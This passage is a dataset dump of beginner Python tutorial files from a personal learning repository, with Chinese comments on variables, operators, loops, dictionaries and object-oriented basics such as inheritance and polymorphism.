"790db8accc1b6add97712256635f2574b87e66e6", "content_id": "6cc7403fc17a62aa5a731d5847e2aa5bb1db35c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 51, "num_lines": 38, "path": "/ibbie_03_变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 变量名 = 变量值\na = \"123\"\nprint(a)\n\nm = 1\nn = 2\nmn = m*n\nmn = mn + 10\nprint(mn)\n\n\"\"\"\npython中不需要声明变量类型\n会自动根据右边的数据推导出准确的类型\n在交互式运行中,可以使用type()可以查看某变量具体类型\n\"\"\"\nname = \"ibbie\" # str\nage = 1 # int\ngender = False # bool\nhigh = 1.58 # float\nweight = 95.0 # float,若不加\".0\"会是int\n\n\"\"\"\n数据类型\n\n数值型 :数值型之间可以相互进行运算\n 整型 int :在python2.x的时候还分int和long,python3.x后只有int\n 浮点型 float\n 布尔型 bool :若布尔型参与运算,true代表1,false代表0\n True 非0数\n False 0\n 复数型 complex 主要用于科学计算\n\n非数值型\n 字符串\n 列表\n 元组\n 字典\n\"\"\"" }, { "alpha_fraction": 0.5075445771217346, "alphanum_fraction": 0.5349794030189514, "avg_line_length": 12.254545211791992, "blob_id": "ae0bbb39c8db8128977de250ba40681979865e53", "content_id": "6322f6698bfdfa9fda2e23d5c44918c08df02356", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1091, "license_type": "no_license", "max_line_length": 56, "num_lines": 55, "path": "/ibbie_08_if语句与比较运算符.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n比较运算符\n == 相等\n != 不等于\n > 大于\n < 小于\n >= 大于等于\n <= 小于等于\n\"\"\"\n\n\"\"\"\n逻辑运算符\n and : 条件1 and 条件2\n or : 条件1 or 条件2\n not : not 条件\n\"\"\"\n# if语句\n# if语句后缩进的内容都属于if符合条件后要执行的代码块中,没有缩进的部分则离开了if中的代码块,else同理\n\nage = 50\n\n# if\nif age < 25:\n print(\"你太幸福啦!\")\n print(\"哈哈哈哈\")\nprint(\"啦啦啦啦\") # 无论是否满足条件,此行都会执行\n\nsex = \"girl\"\n\n# if-else\nif sex == \"girl\":\n print(\"你是个可爱的女生\")\nelse: # else必须与if搭配使用\n print(\"你是个帅气的男生\")\n\n# if-elif\nif age < 18:\n print(\"你真可爱\")\nelif age < 25:\n print(\"你真漂亮\")\nelif age < 40:\n print(\"你真优雅\")\nelse:\n print(\"你永远18岁\")\n\n# if的嵌套\nif sex == \"girl\":\n print(\"你是个女生\")\n if age <= 18:\n print(\"你最漂亮\")\n else:\n print(\"你永远18岁\")\nelse:\n print(\"你是个男生\")\n print(\"你是永远的大猪蹄子\")\n" }, { "alpha_fraction": 0.5737265348434448, "alphanum_fraction": 0.5737265348434448, "avg_line_length": 11.032258033752441, "blob_id": "5839e093920e86c0a2f9fa7449540a2552311a06", "content_id": "c3ae163623880eccb046da8a7f63bea4655522f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 38, "num_lines": 31, "path": "/ibbie_36_多态.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n多态\n 不同的子类对象,调用相同的父类方法,产生不同的结果(同java,略)\n\"\"\"\n\n\nclass Animal:\n def eat(self):\n print(\"吃东西\")\n\n\nclass Dog(Animal):\n def eat(self):\n print(\"狗狗吃骨头\")\n\n\nclass Cat(Animal):\n def eat(self):\n print(\"猫猫吃鱼\")\n\n\nclass Master:\n def feed(self,animal):\n animal.eat()\n\n\ncat = Cat()\ndog = Dog()\nmaster = Master()\nmaster.feed(cat)\nmaster.feed(dog)\n" }, { "alpha_fraction": 0.5402061939239502, "alphanum_fraction": 0.6247422695159912, "avg_line_length": 15.724138259887695, "blob_id": "7eddc162b555d2214052308b538b097db7108a39", "content_id": "b93ee1fc1f10594b8e479709bfaf62e0518174a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 733, "license_type": "no_license", "max_line_length": 42, "num_lines": 29, "path": "/ibbie_37_类属性.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n类属性(类似java的静态属性,但不完全相同)\n 类名.类属性\n 对象.类属性(不推荐,容易混淆,造成误解)\n 若使用 对象.类属性=值 进行赋值操作,只会给对象增加属性,而不会修改类属性\n\"\"\"\n\n\nclass Demo:\n count = 0 # 记录创建了多少个对象\n\n def __init__(self):\n # 每创建一个对象count+1\n Demo.count += 1\n\n\nd1=Demo()\nd2=Demo()\nd3=Demo()\nd4=Demo()\nd5=Demo()\nprint(Demo.count) # 5\nd5.count += 1 # 尝试使用对象修改类属性\nprint(Demo.count) # 5 类属性不变\nprint(d5.count) # 6 对象属性\n\n\"\"\"两个count不是同一个东西\"\"\"\nprint(id(d5.count)) # 1632908634576\nprint(id(Demo.count)) # 1632908634544\n" }, { "alpha_fraction": 0.2886597812175751, "alphanum_fraction": 0.34020617604255676, "avg_line_length": 16.321428298950195, "blob_id": "b09f570fcd5393594524519fe33f5498c7998fc0", "content_id": "55d44ec13a1775b5454dee5f574433cbf56bb892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 42, "num_lines": 28, "path": "/ibbie_11_赋值运算符.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n赋值运算符\n = a = b + c\n += a += b 表示 a = a + b\n -= a -= b 表示 a = a - b\n *= a *= b 表示 a = a * b\n /= a /= b 表示 a = a / b\n //= a //= b 表示 a = a // b (//表示整除)\n %= a %= b 表示 a = a % b\n **= a **= b 表示 a = a ** b\n\"\"\"\ni = 1\ntotal = 0\nwhile i <= 100:\n total += i\n i += 1\n\nprint(\"1到100所有整数的和是:%d\" % total)\n\nj = 1\ntotal1 = 0\nwhile j <= 100:\n if j % 2 == 0:\n total1 += j\n\n j += 1\n\nprint(\"1到100所有偶数的和是:%d\" % total1)\n" }, { "alpha_fraction": 0.7217898964881897, "alphanum_fraction": 0.7587548494338989, "avg_line_length": 21.30434799194336, "blob_id": "3458c964aabaac28ce314b9716ef7d6f1b61d0aa", "content_id": "c306008f5ce273c29a28e6b0b1a471c252db0a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 968, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/ibbie_41_import.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "import ibbie_37_类属性 # 导入模块\nimport ibbie_39_类方法和静态方法 as ibbie39 # 导入模块并为模块起别名,方便后续调用\nfrom ibbie_40_异常 import input_psw # 导入模块中指定的工具\nfrom ibbie_14_函数 import * # (不推荐使用)表示导入模块的全部工具,但是后续调用无需带上模块名\nimport ibbie_42_内置属性name\n\n\"\"\"\n注意:假如使用from import导入不同模块的同名工具,后导入的会覆盖前面导入的\n可以使用 as 起别名,加以区分\n\"\"\"\n\n\"\"\"\n注意:import导入模块时,会将模块中的直接可执行的代码也执行一遍\n可以使用__name__属性,加入适当的判断,使代码不会被执行,详见:ibbie_42_内置属性name\n\"\"\"\n\n# 使用 “模块名.” 调用模块的工具\nibbie_37_类属性.Demo()\n# 使用模块的别名调用模块的工具\nibbie39.Tool()\n# 使用from xxx import xxx的工具可以直接调用\ninput_psw()\ntest2()\n\n" }, { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 14.041666984558105, "blob_id": "ff8ea91da6694f34c8ae196a92799406a3bbe8ac", "content_id": "f54af33beace7ffa4d035671dbf2e4e285daf728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 35, "num_lines": 24, "path": "/ibbie_48_编码.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nASCII编码\n 早期使用的编码,只有256个字符,每个字符占1字节\nUNICODE编码\n 几乎涵盖了全世界所有的字符\n UTF-8,是UNICODE的一种\n 使用1-6个字节表示一个字符\n 大多数汉字使用3个字节表示\n\nPython2.X默认使用ASCII\nPython3.X默认使用UTF-8\n\n可以在文件开头指定编码\n 添加注释:# *-* coding:utf8 *-*\n 或:# coding=utf8\n\npython2.X会将中文字符切成3个1个字节的字符输出,就会导致乱码\n 可以在字符串前加一个u,表示这是一个utf-8编码的字符串\n\"\"\"\n\nstr = u\"我是一条字符串\"\n\nfor c in str:\n print(c)" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.54666668176651, "avg_line_length": 14.028571128845215, "blob_id": "84a49f93c9e05a35e7ae543e8b03dc7f9cb0a8ce", "content_id": "46c307e6ff9ee2095a1b618b7268653d8c6d124a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 38, "num_lines": 35, "path": "/ibbie_32_父类的公有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n父类的公有属性和方法\n 子类可以调用父类的公有属性和方法\n 子类对象也可以调用父类的公有属性和方法\n 可以通过父类的公有方法,在子类间接调用父类的私有属性和方法\n\"\"\"\n\n\nclass A:\n def __init__(self):\n self.a = \"父类公有属性\"\n self.__b = \"父类的私有属性\"\n\n def test(self):\n print(\"父类公有方法\")\n print(\"父类的公有方法中调用父类的私有属性和方法:\")\n print(self.__b)\n self.__test2()\n\n def __test2(self):\n print(\"父类私有方法\")\n\n\nclass B(A):\n def demo(self):\n # 子类调用父类的公有属性和方法\n print(self.a)\n self.test()\n\n\nb = B()\nb.demo()\n# 子类对象调用父类的公有属性和方法\nprint(b.a)\nb.test()" }, { "alpha_fraction": 0.6011779308319092, "alphanum_fraction": 0.6255784630775452, "avg_line_length": 18.32520294189453, "blob_id": "4bcc24abf0197be59605dbefefe543141b48a295", "content_id": "4bdd0ffd64c960016bda7cd0e75901d67cadf22b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3707, "license_type": "no_license", "max_line_length": 72, "num_lines": 123, "path": "/ibbie_24_函数的变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n函数的变量\n 在函数内部,对传递进来的参数进行赋值操作,无论是否是可变数据类型,都不会修改函数外部的变量\n 对于可变数据类型,在函数内部使用方法进行修改,修改效果能作用到函数外\n\n关于列表的+=操作\n 对list使用+=,本质上是执行extend方法:list.extend(list)\n\n函数缺省参数的默认值\n 可以在函数的参数列表,对参数设置默认值,如果没有传递对应的参数,直接使用参数的默认值\n 设置了默认值的参数(也就是可以缺省的参数),必须放在参数列表的末尾\n 如果有多个参数设置了默认值,调用函数时,如果想对指定参数赋值,要加上参数名称\n\n多值参数\n 参数名前加*,表示参数是元组,一般习惯元组参数表示成 **args\n 参数名前加**,表示参数是字典,一般习惯将字典参数表示成 **kwargs\n 不加*也可以对函数传递元组,但调用时需要给参数加上(),而函数参数加了*则可以省略()\n 元组和字典的拆包:\n 给函数的参数加上*或**后,调用时无需给参数加上()或{},简化了函数的调用,称为拆包\n\"\"\"\ngl_num = 99\ngl_num_list = [1, 2, 3]\n\n\ndef demo1(num, num_list):\n \"\"\"使用赋值操作修改传递进来的参数(可变+不可变)\"\"\"\n print(\"demo1内,修改前:\")\n print(num)\n print(num_list)\n num = 10\n num_list = [4, 5, 6]\n print(\"demo1内,修改后:\")\n print(num)\n print(num_list)\n\n\ndemo1(gl_num, gl_num_list)\nprint(\"修改后,函数外部:\")\nprint(gl_num)\nprint(gl_num_list)\n\n\ndef demo2(num_list):\n \"\"\"使用方法修改传递进来的参数(可变数据类型)\"\"\"\n print(\"demo2内,修改前:\")\n print(num_list)\n num_list.append(666)\n print(\"demo2内,修改后:\")\n print(num_list)\n\n\ndemo2(gl_num_list)\nprint(\"修改后,函数外:\")\nprint(gl_num_list)\n\n\ndef demo3(num_list):\n \"\"\"使用+=运算符\"\"\"\n print(\"在demo3内,使用+=前:\")\n print(num_list)\n num_list += num_list\n print(\"在demo3内,使用+=后:\")\n print(num_list)\n\n\ndemo3(gl_num_list)\nprint(\"使用+=后,函数外部:\")\nprint(gl_num_list) # 函数外部list也发生了变化,说明+=运算符执行的不是list = list + list的赋值操作\n\n\ndef demo4(name, is_rich=True):\n \"\"\"给参数设置默认值,设置了默认值的参数可以缺省\"\"\"\n if is_rich:\n answer = \"必须的!\"\n else:\n answer = \"恐怕要再努力点~\"\n print(\"%s会变成有钱人吗?%s\" % (name, answer))\n\n\ndemo4(\"ibbie\")\ndemo4(\"傻猪猪\", False)\n\n\ndef demo5(name, title=\"打工人\", is_hard=True):\n \"\"\"给多个参数设置默认值\"\"\"\n if is_hard:\n answer = \"很努力!\"\n else:\n answer = \"恐怕要再努力点~\"\n print(\"%s是个%s,会变成有钱人吗?%s\" % (name, title, answer))\n\n\ndemo5(\"小明\", is_hard=False) # 跳过title,给is_hard参数赋值,需要带上参数名\n\n\ndef demo6(num, *args, **kwargs):\n \"\"\"多值参数\"\"\"\n print(num)\n print(args)\n print(kwargs)\n\n\ndemo6(1, 2, 3, 4, 5, name=\"ibbie\", gender=False)\n# 1分给了num参数,其它数字给了args,键值对给了kwargs\n# 1\n# (2, 3, 4, 5)\n# {'name': 'ibbie', 'gender': False}\n\n\ndef demo7(args):\n temp_total = 0\n for i in args:\n temp_total = temp_total + i\n\n return temp_total\n\n\n# TypeError: demo7() takes 1 positional argument but 4 were given\n# 函数的参数没有*,解释器会把调用处的参数当成多个个独立的参数,而不是一个元组参数\n# 需要给参数加上()\n# total = demo7(1, 2, 3, 4)\ntotal = demo7((1, 2, 3, 4))\nprint(total)\n" }, { "alpha_fraction": 0.4000000059604645, "alphanum_fraction": 0.5428571701049805, "avg_line_length": 14.55555534362793, "blob_id": "20e75aeef87bf759b51410730826c4b3379216a6", "content_id": "061e6fac986b324949f6516caabc897a7750d12b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/ibbie_02_运算符.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "print(1+1) # 加\nprint(20-10) # 减\nprint(10*10) # 乘\nprint(123/5) # 除\nprint(9 % 2) # 求余\nprint(2**3) # 幂\n\n# 乘号可以重复给定字符串\nprint(\"哈哈哈!!!\"*20)\n" }, { "alpha_fraction": 0.5197324156761169, "alphanum_fraction": 0.5565217137336731, "avg_line_length": 20.35714340209961, "blob_id": "676a1d41225530e68552c00571d79615e5324d38", "content_id": "57bcadb690c230900d80accddcb23244bad08874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1967, "license_type": "no_license", "max_line_length": 88, "num_lines": 70, "path": "/ibbie_20_公共方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n公共方法\n len() 计算容器元素个数\n del() 删除变量\n max() 返回容器中的最大值,如果是字典,只比较key\n min() 返回容器中的最小值,如果是字典,只比较key\n cmp() 比较大小,Python3.X已经取消,可用比较运算符进行比较,但比较运算符不能比较字典\n 切片 字符串、列表、元组都支持切片,字典不支持\n * 重复字符串、列表、元组的内容,不会修改原来的内容,字典不支持\n + 合并字符串、列表、元组的内容,不会修改原来的内容,字典不支持\n in & not in 判断是否包含,字典只判断key\n\n\n +与append()与extend()的区别\n + 不修改容器原来的内容\n append() 将参数中的内容作为一个元素放到容器中\n extend() 将参数的内容与原容器拼接\n\"\"\"\nt_list = [5, 8, 7, 6, 3]\nt_tuple = (\"a\", 256, 2.5, False, \"lalal\")\nt_dic = {\"key1\": 12,\n \"key2\": 200,\n \"key3\": 10.0}\nt_str = \"alkndglgahdlhgasdgasz\"\n\n\"\"\"del关键字 & del()\"\"\"\nprint(t_list)\ndel t_list[1]\nprint(t_list)\ndel(t_list[1])\nprint(t_list)\n\n\"\"\"len()\"\"\"\nll = len(t_list)\nlt = len(t_tuple)\nld = len(t_dic)\nls = len(t_str)\n\n\"\"\"max()\"\"\"\nml = max(t_list)\n# mt = max(t_tuple) # TypeError: '>' not supported between instances of 'int' and 'str'\nmd = max(t_dic)\nms = max(t_str)\n\n\"\"\"min()\"\"\"\nml = min(t_list)\n# mt = min(t_tuple) # TypeError: '>' not supported between instances of 'int' and 'str'\nmd = min(t_dic)\nms = min(t_str)\n\n\"\"\"切片\"\"\"\nt_list = [5, 8, 7, 6, 3]\nt_tuple = (\"a\", 256, 2.5, False, \"lalal\")\nprint(t_list[2:-1])\nprint(t_tuple[1:-1:2])\n\n\"\"\"重复\"\"\"\nprint(t_list * 2)\nprint(t_tuple * 5)\n\n\"\"\"合并\"\"\"\nt_list2 = [1, 2]\nt_tuple2 = (\"haha\", 12.3, True)\nprint(t_list + t_list2)\nprint(t_tuple + t_tuple2)\n\n\"\"\"in & not in\"\"\"\nprint(1 in t_list)\nprint(256 not in t_tuple)\nprint(\"key1\" in t_dic)\n" }, { "alpha_fraction": 0.40758293867111206, "alphanum_fraction": 0.4265402853488922, "avg_line_length": 8.590909004211426, "blob_id": "7db883d7877dfa9c2bd34364d69626b7c66b4f84", "content_id": "20866e4f3f3a486fd0e373a6f126e45c8a3afd14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "no_license", "max_line_length": 23, "num_lines": 22, "path": "/ibbie_23_交换变量的值.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n交换两个变量的值\n\"\"\"\na = 10\nb = 20\n\n\"\"\"方法一,添加中间变量\"\"\"\n# c = a\n# a = b\n# b = c\n\n\"\"\"方法二,不增加中间变量\"\"\"\n# a = a + b\n# b = a - b\n# a = a - b\n\n\"\"\"方法三,利用元组,python特有\"\"\"\n# a, b = (b, a)\na, b = b, a # 可以省略小括号\n\nprint(a)\nprint(b)\n" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 13.733333587646484, "blob_id": "14baa4ec352e16aa1b153ef2d90327f65a774efc", "content_id": "7b85ba4e4c16e2ae66cc994cfe6834efafaa1427", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 61, "num_lines": 15, "path": "/ibbie_42_内置属性name.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n__name__\n 保存的是当前模块名\n 若在当前模块输出该属性,输出的是__main__\n 若在非当前模块输出该属性,输出的是模块名\n 可以使用该属性,在模块中加入判断后测试代码,不影响测试的同时,在其它模块使用该模块时,不会把模块的测试代码执行一遍\n\"\"\"\n\n\ndef main():\n print(\"一堆测试代码\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6041958332061768, "alphanum_fraction": 0.6069930195808411, "avg_line_length": 24.535715103149414, "blob_id": "d2155079d316261652fe1fee70be4cbf63ea8b19", "content_id": "0000d7514d1754535254306f40e72dfb6a01761f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 75, "num_lines": 28, "path": "/ibbie_28_私有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n私有属性和方法\n 在属性名或方法名前添加两条下划线,表示此属性或方法是私有的\n 只能在类的内部直接调用\n 在python中没有真正的私有属性或方法\n 在外部想要调用私有属性或方法,使用 _类名__属性名 或 _类名__方法名 的方式调用(不建议使用)\n\"\"\"\n\n\nclass Girl:\n def __init__(self, name):\n self.name = name\n self.__age = 18 # 私有属性\n\n def getname(self):\n self.__getage() # 类内部可以调用私有方法\n print(\"我叫%s今年%d岁\" % (self.name, self.__age)) # 类内部可以调用私有属性\n\n def __getage(self): # 私有方法\n print(\"我今年%d岁\" % self.__age)\n\n\nd = Girl(\"猪猪girl\")\n# d.__age # AttributeError: 'Girl' object has no attribute '__age'\nprint(d._Girl__age) # _类名__私有属性 可以在类外部调用私有属性\nd._Girl__getage() # _类名__私有方法 可以在类外部调用私有方法\n# d.__getage() # AttributeError: 'Girl' object has no attribute '__getage'\nd.getname()\n" }, { "alpha_fraction": 0.5744274854660034, "alphanum_fraction": 0.5744274854660034, "avg_line_length": 12.789473533630371, "blob_id": "f49f7ac509f360c850eb62203b48292ad97d72e8", "content_id": "accb6b4775a203ddcff8feb353047bcfe6ee8016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 40, "num_lines": 38, "path": "/ibbie_30_方法的重写.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n方法的重写\n 父类的方法不能满足子类的需求\n 在子类中定义与父类同名的方法,重写方法的实现即可\n\nsuper()\n 代表父类\n 可以通过super()调用父类的方法,super().方法名()\n 重写方法时,可以通过调用父类的方法,不完全覆盖父类的方法,实现方法的扩展\n\"\"\"\n\n\nclass Animal:\n\n def eat(self):\n print(\"吃东西\")\n\n def sleep(self):\n print(\"睡觉\")\n\n\nclass Dog(Animal):\n\n def bark(self):\n print(\"汪汪汪\")\n\n def sleep(self): # 重写父类的方法\n print(\"四脚朝天地睡\")\n\n def eat(self):\n super().eat() # 调用父类的eat方法\n print(\"吃的是骨头\")\n\n\ndog = Dog()\ndog.sleep() # 调用的是Dog重写的sleep方法\ndog.eat()\ndog.bark()\n" }, { "alpha_fraction": 0.61208575963974, "alphanum_fraction": 0.6140350699424744, "avg_line_length": 13.25, "blob_id": "809e723d95377897614b9087817ee35162b86944", "content_id": "def154bd26fa88d2361631bd1b4d0872443607ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 49, "num_lines": 36, "path": "/ibbie_39_类方法和静态方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n类方法\n @classmethod\n def 类方法名(cls):\n pass\n\n cls表示当前类\n @classmethod表示这是一个类方法\n 类方法的第一个参数必须是cls\n cls.类属性 调用类属性\n\n静态方法\n @staticmethod\n def 静态方法名():\n print(\"我是静态方法\")\n\n @staticmethod表示这是一个静态方法\n 可以将 不需要访问实例属性和类属性 以及 不需要调用实例方法和类方法 的方法定义成静态方法\n 类名.静态方法() 调用静态方法\n\"\"\"\n\n\nclass Tool:\n count = 0\n\n @classmethod\n def get_tool_count(cls):\n print(cls.count)\n\n @staticmethod\n def test_methon():\n print(\"我是静态方法\")\n\n\nTool.get_tool_count()\nTool.test_methon()\n" }, { "alpha_fraction": 0.4156171381473541, "alphanum_fraction": 0.44458436965942383, "avg_line_length": 14.880000114440918, "blob_id": "cf4aa5c3f8f7a35747b0c2fc5b7f763d029e7920", "content_id": "05c9103bf8dd6e5df8a19ca430462e99f57e1320", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1132, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/ibbie_10_循环语句.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n程序三大流程\n 顺序--从上向下,顺序执行\n 分支--根据条件判断,决定执行代码的分支\n 循环--让特定代码重复执行\n\nwhile循环 当满足条件就继续\n\"\"\"\n\ni = 1 # 计数器初始化\nwhile i <= 10:\n print(\"hello\")\n i = i + 1 # 不要忘记计数器,否则会造成死循环\nprint(\"循环结束后,i=%d\" % i) # i=11\n\n# 嵌套循环\nm = 1\nwhile m <= 10:\n n = 1\n star = \"\"\n while n <= m:\n star = star + \"*\"\n n = n + 1\n\n print(star)\n m = m + 1\n\nprint(\"----我是一条分隔符----\")\n\n# 不换行输出:pring(\"输出的内容\",end=\"\"),默认end是换行符,显式指定end可以改变结尾的符号\nj = 10\nwhile j >= 1:\n k = j\n while k >= 1:\n print(\"⭐\", end=\"♥\") # end=\"\"表示结尾不加任何东西,也可以指定其它符号\n k = k - 1\n print(\"\")\n j = j - 1\n\nprint(\"----我是一条分隔符----\")\n\n# 九九乘法表\na = 1\nwhile a <= 9:\n b = 1\n while b <= a:\n print(\"%d * %d = %d\" % (a, b, a * b), end=\"\\t\") # 使用了制表符“\\t”\n b = b + 1\n print(\"\")\n a = a + 1\n" }, { "alpha_fraction": 0.559624433517456, "alphanum_fraction": 0.6704225540161133, "avg_line_length": 16.177419662475586, "blob_id": "c2776ec06eec4be9a888fa72b8cd7e41282eb42c", "content_id": "51fe8e4609a89c4bf1d664d1338c04e20452314d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 59, "num_lines": 62, "path": "/ibbie_22_变量.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n变量\n 赋值操作传递的是引用,修改的是引用\n 方法修改的是引用指向的值,而不是修改引用\n id() 查看变量的内存地址\n\n不可变类型:\n 数值,元组,字符串\n hash() 提取不可变数据的特征码,返回的是一个整数,相同的内容会得到相同的整数,不同的内容会得到不同的整数\n 字典的key只能使用不可变的数据类型,python会对key进行hash以决定如何在内存中保存字典的数据\n可变类型:列表,字典\n\n局部变量:\n 函数内部定义的变量,只能在函数内部使用\n 生命周期:函数执行时创建,函数结束后回收\n全局变量:\n 在函数外部定义的变量,所有函数都可以使用这个变量\n 在python中,函数不能直接修改全局变量的值\n 想要在函数内部修改全局变量,要使用global关键字,显式声明要修改的是全局变量\n 建议:模块中的全局变量定义在所有函数定义的上方,确保每个函数都能正常访问全局变量的值\n 命名要求:增加“gl_”或\"g_\"前缀\n\n一般的代码结构:从上到下,shebang==>import模块==>全局变量==>函数定义==>执行代码\n\"\"\"\n\n# a = 1\n# print(id(a)) # 2232464140592\n#\n# b = a\n# print(id(b)) # 2232464140592\n# print(id(1)) # 2232464140592\n#\n# a = 2\n# print(id(a)) # 2232464140624\n# print(id(b)) # 2232464140592\n\ntemp_list = [1, 2, 3]\nprint(id(temp_list)) # 1540399587840\ntemp_list.insert(3, 66)\nprint(id(temp_list)) # 1540399587840\n\n# 全局变量\nnum = 10\n\n\ndef demo():\n # 局部变量\n num = 99 # 函数内部,不会修改同名的全局变量\n print(num)\n\n\ndef demo2():\n # 使用global关键字声明num是全局变量\n global num\n num = 666\n\n\nprint(num) # 10\ndemo() # 99\nprint(num) # 10\ndemo2()\nprint(num) # 666\n" }, { "alpha_fraction": 0.7862595319747925, "alphanum_fraction": 0.8015267252922058, "avg_line_length": 17.85714340209961, "blob_id": "263c8d1741b10d79570b5472305761003c00d1b4", "content_id": "ddd758f59475fe173dd19aae5af88d382d730a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/ibbie_35_新式类和旧式类.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n新式类:以Object为基类的类(推荐使用)\n旧式类(经典类):不以Object为基类的类(不推荐使用)\n\npython2.x中,定义类时若不指定父类,不会以Object为基类\npython3.x中,定义类时若不指定父类,默认以Object为基类\n\"\"\"" }, { "alpha_fraction": 0.5591586232185364, "alphanum_fraction": 0.590709924697876, "avg_line_length": 19.375, "blob_id": "116bc08b5b876df5a3755c4c2b4a3a25ee96613a", "content_id": "c38a33a3499b951d11d67111d4d9809b8e3782a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "no_license", "max_line_length": 74, "num_lines": 56, "path": "/ibbie_18_字典.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n字典(dictionary)\n 使用键值对存储数据,通常用于存储描述一个物体的相关信息\n 字典是一个无序的数字集合\n 字典名 = {键:值,键:值,键:值,键:值}\n 键是唯一的,只使用字符串、数字或元组\n 值可以是任何类型,一个键对应只有一个值\n\"\"\"\n\n\"\"\"定义字典\"\"\"\nibbie_dic = {\"name\": \"ibbie\",\n \"age\": 1,\n \"height\": 2.00,\n \"hobby\": \"敲代码\"}\nprint(ibbie_dic)\n\n\"\"\"从字典中取值\"\"\"\nprint(ibbie_dic[\"name\"])\n# ibbie_dic[\"gender\"] # 若key不存在,报错:KeyError\n\n\"\"\"根据key修改value,若key不存在,会在字典中添加新的键值对\"\"\"\nibbie_dic[\"age\"] = 2 # key存在,修改key对应的value\nprint(ibbie_dic)\n\nibbie_dic[\"weight\"] = 90.0 # key不存在,新增键值对\nprint(ibbie_dic)\n\n\"\"\"删除键值对\"\"\"\nibbie_dic.pop(\"age\")\nprint(ibbie_dic)\n# ibbie_dic.pop(\"abc\") # KeyError\n\n\"\"\"字典中键值对的数量\"\"\"\nprint(len(ibbie_dic))\n\n\"\"\"合并字典\"\"\"\ntemp_dic = {\"phone\": \"13100000000\",\n \"gender\": False}\nibbie_dic.update(temp_dic)\nprint(ibbie_dic)\n\ntemp2_dic = {\"phone\": \"13188888888\"}\nibbie_dic.update(temp2_dic) # 如果合并的字典中有相同的key,会替换掉被updated的字典中相同key的value\nprint(ibbie_dic)\n\n\"\"\"清空字典\"\"\"\nibbie_dic.clear()\nprint(ibbie_dic)\n\n\"\"\"遍历字典\"\"\"\nibbie_dic = {\"name\": \"ibbie\",\n \"age\": 1,\n \"height\": 2.00,\n \"hobby\": \"敲代码\"}\nfor k in ibbie_dic:\n print(\"%s : %s\" % (k, 